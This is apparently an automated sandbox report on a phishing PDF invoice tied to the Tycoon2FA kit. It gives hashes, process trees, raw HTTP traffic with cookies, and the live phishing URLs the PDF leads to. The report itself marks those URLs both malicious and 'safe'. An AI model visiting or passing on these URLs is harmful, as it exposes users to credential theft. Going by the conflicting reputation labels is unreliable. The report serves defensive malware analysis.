Edit tour

Windows Analysis Report
Invoice1-1706517.pdf

Overview

General Information

Sample name:Invoice1-1706517.pdf
Analysis ID:1646841
MD5:5af5ee83faae160ffab3cd5c8cd28117
SHA1:40c1f5fa7e36d118aaf8b467f455eb1c6189eaf6
SHA256:53924aaf790a371a77f5fe5bc1c85ed924e4c26762eea55911845744692274a8
Infos:

Detection

Invisible JS, Tycoon2FA
Score:96
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Multi AV Scanner detection for submitted file
Yara detected AntiDebug via timestamp check
Yara detected Invisible JS
Yara detected Obfuscation Via HangulCharacter
Yara detected Tycoon 2FA PaaS
AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64_ra
  • Acrobat.exe (PID: 6264 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Invoice1-1706517.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
    • AcroCEF.exe (PID: 6440 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • AcroCEF.exe (PID: 6664 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1668 --field-trial-handle=1592,i,2184534190769647755,12034686172842368048,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
    • chrome.exe (PID: 1916 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://stuartburrell.co.uk/pad1.pdf MD5: E81F54E6C1129887AEA47E7D092680BF)
      • chrome.exe (PID: 4004 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1968,i,8760627637937200913,13153085085483446613,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2220 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
SourceRuleDescriptionAuthorStrings
0.1.d.script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
    0.1.d.script.csvJoeSecurity_AntiDebugBrowserYara detected AntiDebug via timestamp checkJoe Security
      0.0.d.script.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
        0.0.d.script.csvJoeSecurity_InvisibleJSYara detected Invisible JSJoe Security
          0.5.d.script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
            Click to see the 3 entries
            No Sigma rule has matched
            No Suricata rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: Invoice1-1706517.pdfVirustotal: Detection: 10%Perma Link
            Source: Invoice1-1706517.pdfReversingLabs: Detection: 15%

            Phishing

            barindex
            Source: https://qs1ywa.vsmaemhjvk.ru/vHFigT/Joe Sandbox AI: Score: 7 Reasons: The brand 'OGFR' is not recognized as a known or well-known brand., The URL 'qs1ywa.vsmaemhjvk.ru' does not match any known legitimate domain associated with a recognized brand., The domain extension '.ru' is a country code for Russia, which may not be relevant to the brand 'OGFR' if it is not a Russian brand., The URL contains random characters and does not resemble a legitimate domain name., The presence of a CAPTCHA input field is common in phishing sites to create a false sense of security. DOM: 0.0.pages.csv
            Source: Yara matchFile source: 0.0.d.script.csv, type: HTML
            Source: Yara matchFile source: 0.0.pages.csv, type: HTML
            Source: Yara matchFile source: 0.0.d.script.csv, type: HTML
            Source: Yara matchFile source: 0.4..script.csv, type: HTML
            Source: Yara matchFile source: 0.0.pages.csv, type: HTML
            Source: Yara matchFile source: 0.1.d.script.csv, type: HTML
            Source: Yara matchFile source: 0.5.d.script.csv, type: HTML
            Source: PDF documentJoe Sandbox AI: Page contains button: 'Open' Source: 'PDF document'
            Source: PDF documentJoe Sandbox AI: PDF document contains prominent button: 'open'
            Source: 0.2..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://qs1ywa.vsmaemhjvk.ru/vHFigT/... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of `atob()` to decode base64-encoded strings, followed by `eval()` to execute the decoded content, poses a significant security risk. Additionally, the script appears to be sending user data to an untrusted domain, which is a clear indicator of malicious intent. Overall, this script exhibits a high level of suspicion and should be treated as a potential security threat.
            Source: 0.4..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://qs1ywa.vsmaemhjvk.ru/vHFigT/... This script demonstrates high-risk behavior with the use of the `eval` function to execute dynamic code. The code is also heavily obfuscated, making it difficult to analyze and understand its true purpose. These factors indicate a high likelihood of malicious intent, and the script should be treated with caution.
            Source: https://qs1ywa.vsmaemhjvk.ru/vHFigT/HTTP Parser: No favicon
            Source: unknownHTTPS traffic detected: 185.199.220.71:443 -> 192.168.2.16:49722 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.199.220.71:443 -> 192.168.2.16:49723 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.16:49724 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.66.137:443 -> 192.168.2.16:49729 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.251.40.100:443 -> 192.168.2.16:49735 version: TLS 1.2
            Source: chrome.exeMemory has grown: Private usage: 0MB later: 40MB
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownTCP traffic detected without corresponding DNS query: 185.199.220.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.199.220.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.199.220.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.199.220.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.199.220.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.199.220.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.199.220.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.199.220.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.199.220.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.199.220.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.199.220.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.199.220.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.199.220.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.199.220.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.199.220.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.199.220.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.199.220.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.199.220.71
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Microsoft-CryptoAPI/10.0Host: x1.i.lencr.org
            Source: global trafficHTTP traffic detected: GET /pad1.pdf HTTP/1.1Host: stuartburrell.co.ukConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /vHFigT/ HTTP/1.1Host: qs1ywa.vsmaemhjvk.ruConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://qs1ywa.vsmaemhjvk.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: qs1ywa.vsmaemhjvk.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://qs1ywa.vsmaemhjvk.ru/vHFigT/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImNHMG9PcHpzNUxJaFVHa1BKbHJpclE9PSIsInZhbHVlIjoiRjVOVi81MjNxMi9lVkZJc0pLT3RMV0JNZTZBcEtGdnBSdG5kOENuREVEdmdaYkF2YTd0dHM3ZGlsY3pTTStaVElhb2F4bURZeG82aVpGeEpVblB2VnVRZk5sc1BWbjFjL3ZXaW16NEtMSGVWSXprZ0ZrUU1lelNURDVtSVo2eDMiLCJtYWMiOiIzNjA1OTYxM2ExMDI4Y2U5OTU3MWM5MmViYTkwZmY3N2JkNTMzMGI1ZmE0ZTI4NTgzYzQ1MWRmMzA5ZmI3ZTI5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjVyVlFlaENzbEIwRUl0N0xGRUtkTHc9PSIsInZhbHVlIjoiZmYybmxva1dMTGRmWDA3RE1RN2JnakExRW1qMUM1NysrQnBPSUt5dCswR256MUs3czNTb0ZRdU9kQUZPb0RYcmY4VUxZbGVQd0ttb3ZpY3h1eGE1OXpEVEtnbWhTNlRLOW83WVN6OGtRZ21UVVBpZFVER0phc2x4eTBPTk1URUkiLCJtYWMiOiJhMmUwOTg2ZGQzMTY1MmM0MmIyYmI2NGYwYmY4NWE0N2QxNzU1MjljYzk4NTVmMDM4OWU4MmZhNjU2NGYzMGI5IiwidGFnIjoiIn0%3D
            Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
            Source: global trafficDNS traffic detected: DNS query: qs1ywa.vsmaemhjvk.ru
            Source: global trafficDNS traffic detected: DNS query: code.jquery.com
            Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
            Source: global trafficDNS traffic detected: DNS query: www.google.com
            Source: unknownHTTP traffic detected: POST /report/v4?s=ctYRgJQU7j2DvqVIUKfIyBrMwupelfNLohRuzXUfIwNixWe%2BrKvqDtUCLdWnn6g0yJuyr7sC5krWh9c91NoadWvONsKtq6sxOr5mK9WpcmnSh7eRRfLRusB7Eo41 HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 435Content-Type: application/reports+jsonOrigin: https://qs1ywa.vsmaemhjvk.ruUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Mar 2025 09:05:33 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ctYRgJQU7j2DvqVIUKfIyBrMwupelfNLohRuzXUfIwNixWe%2BrKvqDtUCLdWnn6g0yJuyr7sC5krWh9c91NoadWvONsKtq6sxOr5mK9WpcmnSh7eRRfLRusB7Eo41"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingserver-timing: cfL4;desc="?proto=TCP&rtt=16350&min_rtt=16337&rtt_var=4619&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2237&delivery_rate=246420&cwnd=252&unsent_bytes=0&cid=bf6b56daf4afe5c7&ts=188&x=0"Cache-Control: max-age=14400CF-Cache-Status: MISSServer: cloudflareCF-RAY: 925501e64f2a5017-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=105240&min_rtt=105166&rtt_var=22298&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1905&delivery_rate=35344&cwnd=245&unsent_bytes=0&cid=22207620d4731cc4&ts=475&x=0"
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownHTTPS traffic detected: 185.199.220.71:443 -> 192.168.2.16:49722 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.199.220.71:443 -> 192.168.2.16:49723 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.16:49724 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.66.137:443 -> 192.168.2.16:49729 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.251.40.100:443 -> 192.168.2.16:49735 version: TLS 1.2
            Source: classification engineClassification label: mal96.phis.evad.winPDF@34/45@9/91
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.6332
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-03-24 05-03-55-078.log
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
            Source: Invoice1-1706517.pdfVirustotal: Detection: 10%
            Source: Invoice1-1706517.pdfReversingLabs: Detection: 15%
            Source: unknownProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Invoice1-1706517.pdf"
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1668 --field-trial-handle=1592,i,2184534190769647755,12034686172842368048,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
            Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\msiexec.exe C:\Windows\System32\MsiExec.exe -Embedding 3F077BA791F69DD3F614CDDCFCD0C79D
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknown
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1668 --field-trial-handle=1592,i,2184534190769647755,12034686172842368048,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://stuartburrell.co.uk/pad1.pdf
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1968,i,8760627637937200913,13153085085483446613,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2220 /prefetch:3
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://stuartburrell.co.uk/pad1.pdf
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1968,i,8760627637937200913,13153085085483446613,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2220 /prefetch:3
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: Invoice1-1706517.pdfInitial sample: PDF keyword /JS count = 0
            Source: Invoice1-1706517.pdfInitial sample: PDF keyword /JavaScript count = 0
            Source: Invoice1-1706517.pdfInitial sample: PDF keyword /EmbeddedFile count = 0
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: Yara matchFile source: 0.1.d.script.csv, type: HTML
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information queried: ProcessInformation
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
            Browser Extensions
            1
            Process Injection
            1
            Masquerading
            OS Credential Dumping1
            Process Discovery
            Remote ServicesData from Local System1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Extra Window Memory Injection
            1
            Process Injection
            LSASS Memory1
            System Information Discovery
            Remote Desktop ProtocolData from Removable Media4
            Non-Application Layer Protocol
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
            Extra Window Memory Injection
            Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
            Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
            Ingress Tool Transfer
            Traffic DuplicationData Destruction

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Invoice1-1706517.pdf11%VirustotalBrowse
            Invoice1-1706517.pdf16%ReversingLabsDocument-PDF.Trojan.ScamX
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://qs1ywa.vsmaemhjvk.ru/vHFigT/0%Avira URL Cloudsafe
            https://stuartburrell.co.uk/pad1.pdf0%Avira URL Cloudsafe
            https://qs1ywa.vsmaemhjvk.ru/favicon.ico0%Avira URL Cloudsafe
            https://a.nel.cloudflare.com/report/v4?s=ctYRgJQU7j2DvqVIUKfIyBrMwupelfNLohRuzXUfIwNixWe%2BrKvqDtUCLdWnn6g0yJuyr7sC5krWh9c91NoadWvONsKtq6sxOr5mK9WpcmnSh7eRRfLRusB7Eo410%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            a.nel.cloudflare.com
            35.190.80.1
            truefalse
              high
              e8652.dscx.akamaiedge.net
              23.46.224.249
              truefalse
                high
                code.jquery.com
                151.101.66.137
                truefalse
                  high
                  www.google.com
                  142.251.40.100
                  truefalse
                    high
                    qs1ywa.vsmaemhjvk.ru
                    104.21.96.1
                    truetrue
                      unknown
                      x1.i.lencr.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://qs1ywa.vsmaemhjvk.ru/vHFigT/true
                        • Avira URL Cloud: safe
                        unknown
                        https://stuartburrell.co.uk/pad1.pdffalse
                        • Avira URL Cloud: safe
                        unknown
                        https://code.jquery.com/jquery-3.6.0.min.jsfalse
                          high
                          https://qs1ywa.vsmaemhjvk.ru/favicon.icofalse
                          • Avira URL Cloud: safe
                          unknown
                          https://a.nel.cloudflare.com/report/v4?s=ctYRgJQU7j2DvqVIUKfIyBrMwupelfNLohRuzXUfIwNixWe%2BrKvqDtUCLdWnn6g0yJuyr7sC5krWh9c91NoadWvONsKtq6sxOr5mK9WpcmnSh7eRRfLRusB7Eo41false
                          • Avira URL Cloud: safe
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          3.219.243.226
                          unknownUnited States
                          14618AMAZON-AESUSfalse
                          142.250.80.35
                          unknownUnited States
                          15169GOOGLEUSfalse
                          142.250.80.46
                          unknownUnited States
                          15169GOOGLEUSfalse
                          23.210.73.6
                          unknownUnited States
                          20940AKAMAI-ASN1EUfalse
                          64.233.180.84
                          unknownUnited States
                          15169GOOGLEUSfalse
                          142.250.80.110
                          unknownUnited States
                          15169GOOGLEUSfalse
                          185.199.220.71
                          unknownUnited Kingdom
                          12488KRYSTALGRfalse
                          142.250.80.74
                          unknownUnited States
                          15169GOOGLEUSfalse
                          23.51.56.185
                          unknownUnited States
                          4788TMNET-AS-APTMNetInternetServiceProviderMYfalse
                          23.47.168.24
                          unknownUnited States
                          16625AKAMAI-ASUSfalse
                          142.251.40.100
                          www.google.comUnited States
                          15169GOOGLEUSfalse
                          104.21.96.1
